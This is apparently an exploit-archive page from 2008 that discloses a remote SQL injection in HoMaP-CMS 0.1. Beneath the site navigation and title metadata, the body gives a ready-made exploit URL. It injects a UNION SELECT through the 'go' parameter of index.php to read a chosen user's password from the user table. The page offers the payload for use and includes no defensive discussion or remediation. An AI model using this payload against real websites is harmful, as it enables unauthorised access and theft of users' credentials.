HoMaP-CMS 0.1 (index.php go) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HoMaP-CMS 0.1 (index.php go) Remote SQL Injection Vulnerability
# Published : 2008-06-23
# Author : SxCx
# Previous Title : emuCMS 0.3 (fckeditor) Arbitrary File Upload Exploit
# Next Title : BlogPHP 2.0 Remote Privilege Escalation Exploit

--------------------------------------------------------------------------------------------------------------------------------
// HoMaP-CMS 0.1 (index.php go) SQL Injection Vulnerability
// Author: SxCx
// Download: SourceForge.net
// Version affected: 0.1
// Exploit: index.php?go=0'+union+select+passwd+from+user+where+username=[USERNAME]
--------------------------------------------------------------------------------------------------------------------------------

# www.Syue.com [2008-06-23]